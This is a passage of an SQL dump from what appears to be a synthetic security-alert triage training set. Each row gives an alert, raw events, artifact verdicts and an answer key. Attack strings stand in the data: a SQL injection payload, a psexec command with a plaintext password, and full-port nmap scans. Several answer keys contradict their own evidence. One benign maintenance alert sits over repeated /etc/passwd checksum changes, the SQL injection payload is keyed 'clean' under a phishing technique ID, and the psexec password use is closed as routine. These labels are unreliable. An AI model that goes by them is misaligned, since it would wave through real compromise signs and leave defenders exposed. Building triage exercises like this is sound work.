3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1820, 'Misconfigured Legacy Application Triggering Command Execution Alert', 'medium', 'Wazuh', 'A command execution event was identified on a legacy server, initially flagged as suspicious. This corresponds to a scheduled task for system maintenance.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"hostname\":\"legacy-app-server\",\"command_line\":\"/usr/bin/python3 /opt/scripts/maintenance.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/python3 /opt/scripts/maintenance.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine maintenance script executed as per schedule\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command execution is part of a scheduled maintenance task and not indicative of malicious activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1821, 'Benign System Health Check Detected as Lateral Movement', 'low', 'Elastic SIEM', 'A series of network connections between internal systems were detected, resembling lateral movement. These are part of a routine system health check script.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"192.168.10.20\",\"hostname\":\"monitoring-server\",\"command_line\":\"check_system_health.sh\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of monitoring server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the system being checked\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"check_system_health.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine system health check script execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"These connections are part of routine health checks and not indicative of unauthorized lateral movement.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1822, 'Network Monitoring Tool Triggering Phishing Alert', 'medium', 'Splunk', 'Traffic from a network monitoring tool was detected, initially flagged as phishing due to its unusual activity patterns. Further review confirms it as legitimate monitoring traffic.', 'Phishing', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:12Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"198.51.100.10\",\"hostname\":\"network-mon\",\"url\":\"http://trusted.monitoring.com/status\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of network monitoring server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted network monitoring service\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://trusted.monitoring.com/status\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is part of a legitimate network monitoring tool\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The network traffic was generated by a legitimate monitoring tool and not indicative of a phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1823, 'Suspicious Process Execution Detected', 'low', 'Splunk', 'A routine system health check triggered a process execution alert. The command used is commonly associated with administrative tasks.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin_user\",\"hostname\":\"server01\",\"command_line\":\"psexec \\\\\\\\10.0.0.10 -u admin -p password123\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for administrative management.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.0.10 -u admin -p password123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized administrative tasks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command line activity is consistent with routine administrative tasks.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1824, 'Failed Login Attempts from Foreign IP', 'medium', 'Azure Sentinel', 'Multiple failed login attempts detected from an IP associated with a routine vulnerability scanning service.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.2\",\"username\":\"user_test\",\"hostname\":\"workstation01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported as part of legitimate vulnerability scanning services.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is known for legitimate scanning activities.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1825, 'Routine Web Request with Suspicious Payload', 'medium', 'Wazuh', 'A web request containing an SQL-like payload was detected, originating from an internal monitoring tool.', 'Web Attack', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"10.0.1.2\",\"dst_ip\":\"192.168.1.100\",\"hostname\":\"webserver01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address related to monitoring.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Payload part of routine testing by internal tools.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is part of internal testing by authorized personnel.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1826, 'Unauthorized SSH Login Attempt', 'high', 'Elastic SIEM', 'An unauthorized SSH login attempt was detected from an external IP address.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.8\",\"username\":\"root\",\"hostname\":\"server02\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP is associated with known malicious activity and the attempt targeted the root account directly; block the source, check for any successful login from this IP on server02, and confirm that direct root SSH login is disabled so repeated attempts cannot succeed.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1827, 'Benign Email Containing Potentially Malicious URL', 'medium', 'Proofpoint', 'An email was flagged for containing a URL typically seen in phishing attempts, but it belongs to a trusted partner.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"192.168.1.50\",\"email_sender\":\"partner@example.com\",\"url\":\"http://trustedpartner.com/login\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"partner@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Email belongs to a known trusted partner.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://trustedpartner.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"URL verified as safe and belongs to a trusted domain.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL and sender are verified as legitimate and trusted.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1828, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'A high volume of network connections was detected from an internal scanning tool. This activity is consistent with routine vulnerability assessments conducted by IT.', 'Network Scan', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"scanner_account\",\"hostname\":\"vuln-scan-01\",\"command_line\":\"nmap -sS -p 1-65535 192.168.1.200\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP used for authorized vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS -p 1-65535 192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Command consistent with routine vulnerability scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scan\",\"analysis_notes\":\"The detected activity was verified as part of scheduled IT security assessments.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1829, 'Authorized Administrative Backup Activity', 'low', 'Wazuh', 'A backup process was initiated by an authorized admin user. This activity matches the scheduled backup routine.', 'Data Transfer', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"backup_admin\",\"hostname\":\"backup-server-01\",\"command_line\":\"rsync -av /data /backup/\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP of authorized backup server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -av /data /backup/\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Authorized backup command executed by admin.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"The activity is part of a scheduled administrative task for data backup.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1830, 'Benign System Health Check Activity', 'low', 'Azure Sentinel', 'System health check performed by an internal monitoring tool. The detected activity aligns with routine system maintenance procedures.', 'System Monitoring', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.75\",\"username\":\"monitor\",\"hostname\":\"health-check-01\",\"command_line\":\"check_system_health -t all\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP of system monitoring server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"check_system_health -t all\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Command executed by internal monitoring tool.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"system_monitoring\",\"analysis_notes\":\"The activity was confirmed as part of a routine system health check.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1831, 'Misconfigured Legacy Application Detected', 'medium', 'Elastic SIEM', 'Unusual traffic patterns noted from a legacy application server. The application is known for generating false positives due to outdated configurations.', 'Network Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.10.10.10\",\"dst_ip\":\"10.10.10.20\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server-01\",\"command_line\":\"legacy_app.exe\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.10.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"Internal IP of misconfigured legacy application server.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"legacy_app.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"Known false positive due to outdated application settings.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"Activity is consistent with the legacy application\'s known behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1832, 'Valid Administrative Login from Unusual Location', 'medium', 'Splunk', 'A valid login was detected from an unusual geographic location for a user account. However, this was verified as the user\'s authorized travel.', 'Credential Use', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.1.5\",\"username\":\"jdoe\",\"hostname\":\"vpn-gateway\",\"command_line\":\"\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with unusual login activity but verified as user travel.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"User confirmed to be traveling and using authorized access.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_use\",\"analysis_notes\":\"Login was verified as legitimate due to user travel.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1833, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'Multiple network connections were detected originating from an internal vulnerability scanner. This is part of routine security checks.', 'Network Activity', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.1\",\"username\":\"scanner_account\",\"hostname\":\"vuln-scan-01\",\"command_line\":\"nmap -sV -p 1-65535 192.168.1.1\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for vulnerability scanning.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sV -p 1-65535 192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized internal scanning.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"This is a scheduled internal vulnerability scan.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1834, 'Authorized Administrative Backup Activity', 'low', 'Azure Sentinel', 'A scheduled backup operation was detected on critical servers. This is part of routine data protection procedures.', 'Data Backup', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.20\",\"username\":\"backup_admin\",\"hostname\":\"backup-server-01\",\"command_line\":\"backup.exe /run /source:server01 /dest:backup-server-01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal server IP involved in backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"backup.exe /run /source:server01 /dest:backup-server-01\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified as a legitimate backup command.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_backup\",\"analysis_notes\":\"Scheduled backup job as part of data protection strategy.\"}', 'Beginner', 'SIEM', 3, 1, 